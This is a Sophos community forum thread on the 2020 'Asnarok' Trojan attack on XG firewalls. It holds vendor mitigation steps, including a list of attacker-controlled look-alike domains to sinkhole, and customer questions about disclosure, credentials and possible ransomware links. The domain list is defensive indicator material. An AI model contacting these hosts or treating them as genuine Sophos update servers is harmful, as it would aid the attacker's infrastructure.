XG firewalls connected to SFM were no longer able to connect or synchronize to SFM. - Notice the following change on the settings

Hi Ninjatech1969 and balletbob 

We sincerely regret any inconvenience this has caused. Sophos is investigating and will be updating this thread with more details as they unfold.

Hi Ninjatech1969 and balletbob 

We sincerely regret any inconvenience this has caused. Sophos is investigating and will be updating this thread with more details as they unfold.

1. The issue can only manifest itself on systems that have exposed the HTTPS admin services or the User Portal on the WAN interface. To prevent this issue, choose the “Administration” link on the left-hand navigation panel of the management console, to get to the “Device Access” page illustrated below where customers must ensure that both Admin services and User Portal are deactivated on the WAN interface as highlighted:
   
   
   
   

   Note: If you currently rely on WAN-based Admin services, we recommend you have configured one of the following BEFORE deactivating these services:

   Administering your Firewall via Sophos Central (recommended):
   https://community.sophos.com/kb/en-us/127461

   Administering your Firewall via Remote Access VPN:
   https://community.sophos.com/kb/en-us/133109

   Sophos Customer Support is available to assist you in completing the steps above as necessary.
   Please reach us at: https://secure2.sophos.com/en-us/support/open-a-support-case.aspx
   
   

2. Affected firewalls have been observed communicating with the following list of unauthorized hosts. Add all the following domains (these are not Sophos domain properties) as DNS host entries and define the IP address as 52.214.97.178 (a Sophos property which will eliminate the unauthorized traffic):

   • sophostraining.org
   • sophosproductupdate.com
   • sophosenterprisecenter.com
   • sophoswarehouse.com
   • Ragnarokfromasgard.com
   • sophosfirewallupdate.com
     For assistance on adding these domains as DNS host entries, please refer to these instructions.
     
     
3. Contact Sophos Support by phone or email to open a case. We will ensure you receive any future communications on this issue.

 Additional screenshots for reference:

I was referred to this post by Sophos support due to the issue linked bellow:

https://community.sophos.com/products/unified-threat-management/f/network-protection-firewall-nat-qos-ips/119975/advanced-threat-protection-triggering-on-sophosproductupdate-com

A question they have yet to answer is why are we being asked to associate domains that Sophos does not own to an IP that also has unknown ownership? I was sent to this post without any clear explanation of why it should be followed. Can anyone here clarify why the dns override above was proposed? 

Thanks,

D.V.

I suspect we'll find out they hard coded some URL into their appliances or SFM and either didn't register them or stopped registering them (hangover from UTM?)

Most of the domains are newly registered 28th March so someone either got lucky or found them and registered them.

100% sure the IP is in control of Sophos which is why they are asking to redirect there so the update mechanism downloads an empty file.

Hello Marco,

could you please explain to me how is it possible that the XG Firewall has obtained EAL4 + certification when it flows into it from all sides?!?

I'm sorry but I really can't understand it. Perhaps only that obtaining this certification was very, very expensive ...
I think you understand what I mean?

Regards

alda

I'd also like to ask why the only notification of this issue was posted to the Community forums and not e-mailed directly to partners and end users upon discovery?  Not everyone watches these forums 24/7.  This should not be the office place to release these notifications.

Also, do we have to worry about saved credentials for things like AD/LDAP servers?   Can you please share a copy of x.sh so we can understand what actions were executed?

Hi AdamBasalyga,

We will soon release more details of the attack and its payloads. Please follow our https://community.sophos.com/kb/en-us/135412 for further updates.

I look at this:

Affected firewalls have been observed communicating with the following list of unauthorized hosts. Add all the following domains (these are not Sophos domain properties) as DNS host entries and define the IP address as 52.214.97.178 (a Sophos property which will eliminate the unauthorized traffic):

• sophostraining.org
• sophosproductupdate.com
• sophosenterprisecenter.com
• sophoswarehouse.com
• Ragnarokfromasgard.com
• sophosfirewallupdate.com
  For assistance on adding these domains as DNS host entries, please refer to these instructions.

And found that some of our desktops were communicating with some of these addresses as early as the 4th of April .

Seems anormal to me.  Did XG leak from WAN to make it to our desktops ??????

Please a quick response.

Paul Jr

After analyzing the components and intent of the attack, Sophos published a SophosLabs Uncut article, “Asnarok” Trojan targets firewalls, to share its current understanding of the malware.

Hi Yashraj,

Thank you for these instructions. I have followed them through and implemented on my firewall. I have also enabled the hotfix auto install as per the instructirons on the links

https://community.sophos.com/kb/en-us/135415 and https://community.sophos.com/kb/en-us/135412 

However, the hotfix has not applied as yet despise several reboots of the firewall. Customer support have requested for firewall access ID for 1 week which I have sent. I hope they can fix it as soon as possible. Interesting, is that two of my machines were attacked by Ragnarök Ransomware on 29th April 2020, would this be associated to this Vulnerability. We have been investigating and now have logs from the Kaspersky endpoint. If interested I can forward the logs.

Kindly also send instructions on how I can Add One Time Password for remote access users.

Regards,

Nicholas.